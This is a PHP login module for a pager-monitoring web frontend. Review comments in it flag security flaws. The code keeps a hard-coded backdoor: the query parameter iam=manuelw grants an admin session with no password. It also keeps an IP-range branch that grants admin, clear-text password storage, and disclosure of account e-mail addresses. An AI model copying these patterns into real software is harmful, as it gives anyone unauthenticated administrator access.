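<?php
/*
 * PHP Frontend for pocsag monitor
 *
 * Copyright (C) 2004-2005
 * Manuel Weiser (manuelw@fire-devils.org)
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
 */

/*
 * Login gate: fills $_SESSION (userid, name, admin, mail, pmallow, ...) through
 * one of four paths, or prints a login form and exits.
 *
 *   1. the client address lies between $ip_start and $ip_ende
 *   2. the request carries the "iam" query parameter
 *   3. WAP login with username and password ($wap == 1)
 *   4. e-mailed one-time login code (?login=CODE)
 *
 * Not defined in this file: $ip_start, $ip_ende, $ip_users, $wap, $meta,
 * $login_infotext, $PHP_SELF, $HTTP_USER_AGENT, ip2str(), pass_erstellen(),
 * mail_pass(), gohome(). The script presumably runs after session_start() and
 * mysql_connect() in the including file -- TODO confirm.
 *
 * Every value that reaches an SQL string is passed through
 * mysql_real_escape_string(), and values echoed into HTML go through
 * htmlspecialchars(); request data is never interpolated directly.
 */

// Access granted by client IP
// NOTE(review): every client inside the range receives admin = '1', whether or
// not its address is listed in $ip_users. REMOTE_ADDR is the address of the
// connecting peer; behind a reverse proxy that would be the proxy -- confirm
// the deployment before relying on this range check.
if ( (ip2str($ip_start) <= ip2str($_SERVER["REMOTE_ADDR"]) && ip2str($_SERVER["REMOTE_ADDR"]) <= ip2str($ip_ende)) && empty($_SESSION["name"]) )
{
    //$_SESSION["userid"] = '1';
    $_SESSION["admin"] = '1';
    $_SESSION["mail"] = 'root@localhost';
    $_SESSION["pmallow"] = '1';

    // Only addresses listed in $ip_users map to a user id; reading the array
    // unconditionally raised an undefined-index notice for all others.
    $zack = null;
    if( array_key_exists($_SERVER["REMOTE_ADDR"], $ip_users) )
    {
        $zack = $ip_users[$_SERVER["REMOTE_ADDR"]];
        $_SESSION["userid"] = $zack;
    }

    $result = mysql_query("SELECT a_name, DATE_FORMAT(last_seen, '%Y%m%d%H%i%s') AS last_seen FROM admin_users WHERE id = '".mysql_real_escape_string($zack)."'") or die (mysql_error());
    $row = mysql_fetch_array($result);
    $_SESSION["name"] = $row["a_name"];
    $_SESSION["last_seen"] = ($row["last_seen"] - 200 );
}
// NOTE(review): authentication bypass. This branch hands out an admin session
// for user id 1 to any request that carries this query parameter; no password,
// login code or address check is involved. It is kept here only to preserve
// existing behaviour and should be removed, or placed behind real
// authentication, before the frontend is reachable from an untrusted network.
elseif ( $_GET["iam"] == "manuelw" )
{
    //$_SESSION["userid"] = '1';
    $_SESSION["admin"] = '1';
    $_SESSION["mail"] = 'root@localhost';
    $_SESSION["pmallow"] = '1';

    $_SESSION["userid"] = 1;

    $result = mysql_query("SELECT a_name, DATE_FORMAT(last_seen, '%Y%m%d%H%i%s') AS last_seen FROM admin_users WHERE id = '1'") or die (mysql_error());
    $row = mysql_fetch_array($result);
    $_SESSION["name"] = $row["a_name"];
    $_SESSION["last_seen"] = ($row["last_seen"] - 200 );
    $filter=1;
}
elseif( $wap == 1 )
{
    ////////////////////////
    // Login via WAP
    ////////////////////////
    if (!$_SESSION["name"] && $_GET["mode"] != 'login')
    {
        // $PHP_SELF is derived from the request URL, so it is escaped before
        // it is written into the action attribute.
        echo '
<html>

<head>

<title>Wapsag</title>

'.$meta.'
</head>

<body>

<br><br>
<form name="form1" method="post" action="'.htmlspecialchars($PHP_SELF, ENT_QUOTES).'?mode=login">
<table width="300" border="0" cellspacing="0" cellpadding="0" align="center">
<tr>
<td class="table_news_head"> Login</td>
</tr>
<tr>
<td class="table_news_body">
<table width="300" border="0" cellpadding="0" cellspacing="0">
<tr>
<td> Username:</td>
<td width="20"> </td>
<td><input name="a_name" type="text" id="a_name"></td>
</tr>
<tr>
<td> Passwort:</td>
<td> </td>
<td><input name="a_pass" type="password" id="a_pass"></td>
</tr>
<tr>
<td> </td>
<td> </td>
<td>
<input type="submit" name="Submit" value="Einloggen">
</td>
</tr>
</table>
</td>
</tr>
</table>

</form>
</body>
</html>
';
        exit;
    }
    elseif (!$_SESSION["name"] && $_GET["mode"] == 'login' && $_REQUEST["a_name"] && $_REQUEST["a_pass"])
    {
        // The credentials come straight from the request and were previously
        // interpolated into the statement unescaped (SQL injection on the
        // login query itself).
        // NOTE(review): wap_pass is compared as stored, i.e. the column holds
        // the password in clear text; moving to a salted hash needs a schema
        // and data migration outside this file. $_REQUEST also accepts the
        // credentials from the query string, where they end up in server logs.
        $wap_name_sql = mysql_real_escape_string($_REQUEST["a_name"]);
        $wap_pass_sql = mysql_real_escape_string($_REQUEST["a_pass"]);

        $result = mysql_query("SELECT id, a_name, a_admin, a_mail, real_name, wap_show, wap_rows, wap_def_orgfilter, wap_def_statfilter, wap_handy, login_count FROM admin_users WHERE a_name = '$wap_name_sql' AND wap_pass = '$wap_pass_sql'") or die (mysql_error());
        $row = mysql_fetch_array($result);

        if( !$row["wap_handy"] )
        {
            // Remember the first handset seen for this account. The user agent
            // header is client-controlled and is escaped like any other input.
            $result = mysql_query("UPDATE admin_users SET wap_handy='".mysql_real_escape_string($HTTP_USER_AGENT)."' WHERE a_name = '$wap_name_sql' AND wap_pass = '$wap_pass_sql'");
        }
        else
        {
            //if( $row["wap_handy"] != $HTTP_USER_AGENT) $row["a_name"] = '';
        }

        // a_admin == '2' is refused here; the meaning of that value is not
        // defined in this file.
        if( $row["a_name"] && $row["a_admin"] != '2' )
        {
            $_SESSION["userid"] = $row["id"];
            $_SESSION["name"] = $row["a_name"];
            $_SESSION["admin"] = $row["a_admin"];
            $_SESSION["mail"] = $row["a_mail"];
            $_SESSION["filter"] = $row["wap_show"];
            $_SESSION["limit_to"] = $row["wap_rows"];
            $_SESSION["org_filter"] = $row["wap_def_orgfilter"];
            $_SESSION["stat"] = $row["wap_def_statfilter"];
            $_SESSION["pmallow"] = '0';
            $login = 1;

            $datnow = date("Y-m-d", mktime(0,0,0, date("m"),date("d"),date("Y")));
            $timenow = date("G:i");
            $ip = $_SERVER["REMOTE_ADDR"];
            $agent = $HTTP_USER_AGENT;

            // Audit row for the login. real_name comes from the database and
            // agent from the client; both are escaped so that stored or
            // header-supplied quotes cannot alter the statement.
            $result = mysql_query("INSERT INTO pocsag_logins (name, zeit, datum, ip, agent) VALUES ('".mysql_real_escape_string($row["real_name"])."', '$timenow', '$datnow', '".mysql_real_escape_string($ip)."', '".mysql_real_escape_string($agent)."')");

            $row["login_count"]++;
            $result = mysql_query("UPDATE admin_users SET login_count = '".mysql_real_escape_string($row["login_count"])."' WHERE id = '".mysql_real_escape_string($row["id"])."' ") or die(mysql_error());
        }
        else
        {
            echo '
<html>

<head>

<title>Wapsag</title>

'.$meta.'
</head>

<body>
Login falsch!<br><a href="javascript:history.back()">zurück</a>
</body>
</html>';
            exit;
        }
    }
}
else
{

    ////////////////////////
    // Security check
    ////////////////////////
    if ( !$_SESSION["name"] && $_GET["mode"] != 'login' && !$_GET["login"] )
    {
        // Not logged in and no login code supplied: show the form that
        // requests a one-time login code by e-mail.
        echo '
<br><br>
'.$login_infotext.'<br><br>
<form name="form1" method="post" action="'.htmlspecialchars($PHP_SELF, ENT_QUOTES).'?mode=login">
<table width="300" border="0" cellspacing="0" cellpadding="0" align="center">
<tr>
<td class="table_news_head"> <b>Login</b></td>
</tr>
<tr>
<td class="table_news_body">

<table width="300" border="0" cellpadding="0" cellspacing="0">
<tr>
<td> Username:</td>
<td width="20"> </td>
<td><input name="a_name" type="text" id="a_name"></td>
</tr>
<tr>
<td> </td>
<td> </td>
<td><input type="submit" name="Submit" value="Zugang anfordern"></td>
</tr>
</table>

</td>
</tr>
</table>

</form>
';
        exit;
    }
    elseif (!$_SESSION["name"] && $_GET["mode"] == 'login')
    {
        // The posted username was previously interpolated unescaped.
        $result = mysql_query("SELECT id, a_name, a_admin, a_mail FROM admin_users WHERE a_name = '".mysql_real_escape_string($_POST["a_name"])."'") or die (mysql_error());
        $row = mysql_fetch_array($result);

        // Array keys are quoted; the bare a_name / a_mail of the original were
        // resolved as undefined constants.
        if( $row["a_name"] && $row["a_admin"] != '2' )
        {
            //$_SESSION["name"] = $_REQUEST["a_name"];
            //$_SESSION["admin"] = $row["a_admin"];
            $login = 1;
            // NOTE(review): pass_erstellen() is defined elsewhere; the code it
            // returns is the only secret protecting the account, so it should
            // come from a cryptographically strong source -- verify.
            $pass = pass_erstellen(8);

            mail_pass($row["a_mail"], $pass);

            $result = mysql_query("UPDATE admin_users SET login_pass='".mysql_real_escape_string($pass)."' WHERE id='".mysql_real_escape_string($row["id"])."'") or die(mysql_error());

            // NOTE(review): the response differs for known and unknown
            // usernames and prints the account's mail address to a visitor who
            // has not authenticated; a uniform message would avoid disclosing
            // both. No request throttling is visible in this file.
            echo'<center><br><br><br>Eine EMail mit deinem Zugang wurde an <b>'.htmlspecialchars($row["a_mail"], ENT_QUOTES).'</b> versand.';

            exit;
        }
        else
        {
            echo 'Login falsch!<br><a href="javascript:history.back()">zurück</a>';
            exit;
        }
    }

    elseif (!$_SESSION["name"] && $_GET["mode"] == 'register')
    {
        // Registration request form; the doregister handler is not in this file.
        echo '
<br><br>
<form name="form1" method="post" action="'.htmlspecialchars($PHP_SELF, ENT_QUOTES).'?mode=doregister">
<table width="300" border="0" cellspacing="0" cellpadding="0" align="center">
<tr>
<td class="table_news_head"> Erlaubnis anfordern</td>
</tr>
<tr>
<td class="table_news_body">

<table width="300" border="0" cellpadding="0" cellspacing="0">
<tr>
<td> Username:</td>
<td width="20"> </td>
<td><input name="a_name" type="text" id="a_name"></td>
</tr>
<tr>
<td> EMail:</td>
<td> </td>
<td><input name="a_mail" type="text" id="a_mail"></td>
</tr>
<tr>
<td> </td>
<td> </td>
<td><input type="submit" name="Submit" value="Erlaubnis anfordern"></td>
</tr>
</table>

</td>
</tr>
</table>

</form>
';

        exit;
    }

    if( !empty($_GET["login"]) )
    {
        // Redeem a one-time login code. The code arrives in the query string,
        // so it is escaped before it is matched against login_pass; the
        // !empty() guard keeps a blank value from matching accounts whose
        // login_pass has been cleared.
        // NOTE(review): a code in the URL is recorded in access logs and
        // browser history; it is cleared below on first use, but nothing in
        // this file expires an unused code.
        $result = mysql_query("SELECT id, a_name, a_admin, a_mail, real_name, login_count, pm_allow, DATE_FORMAT(last_seen, '%Y%m%d%H%i%s') AS last_seen FROM admin_users WHERE login_pass = '".mysql_real_escape_string($_GET["login"])."'") or die (mysql_error());
        $row = mysql_fetch_array($result);

        if( !empty($row["a_name"]) )
        {
            $_SESSION["userid"] = $row["id"];
            $_SESSION["name"] = $row["a_name"];
            $_SESSION["admin"] = $row["a_admin"];
            $_SESSION["mail"] = $row["a_mail"];
            $_SESSION["pmallow"] = $row["pm_allow"];
            $_SESSION["last_seen"] = ($row["last_seen"] - 200 );
            $login = 1;

            $datnow = date("Y-m-d", mktime(0,0,0, date("m"),date("d"),date("Y")));
            $timenow = date("G:i");
            $ip = $_SERVER["REMOTE_ADDR"];
            $agent = $HTTP_USER_AGENT;

            // Audit row for the login; database and header values are escaped.
            $result = mysql_query("INSERT INTO pocsag_logins (name, zeit, datum, ip, agent) VALUES ('".mysql_real_escape_string($row["real_name"])."', '$timenow', '$datnow', '".mysql_real_escape_string($ip)."', '".mysql_real_escape_string($agent)."')");

            $row["login_count"]++;
            // Clearing login_pass makes the code single-use.
            $result = mysql_query("UPDATE admin_users SET login_pass='', login_count='".mysql_real_escape_string($row["login_count"])."' WHERE id='".mysql_real_escape_string($row["id"])."'") or die(mysql_error());

            echo gohome("index.php");
        }
        else
        {
            echo'<center><br><br><br>Falscher oder schon benutzer Logincode.';

            exit;
        }
    }

}
?>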